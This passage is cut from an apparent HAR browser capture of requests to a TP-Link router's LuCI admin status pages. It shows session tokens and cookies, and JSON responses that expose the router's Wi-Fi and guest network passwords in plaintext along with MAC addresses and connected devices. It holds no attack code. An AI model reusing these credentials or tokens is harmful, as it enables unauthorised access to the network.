\"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 267,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 704,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:39.651+03:00\",\r\n \"time\": 1827,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 262,\r\n \"dns\": 251,\r\n \"connect\": 530,\r\n \"send\": 0,\r\n \"wait\": 784,\r\n \"receive\": 0\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:49.649+03:00\",\r\n \"time\": 944,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 649,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:49.654+03:00\",\r\n \"time\": 1787,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n 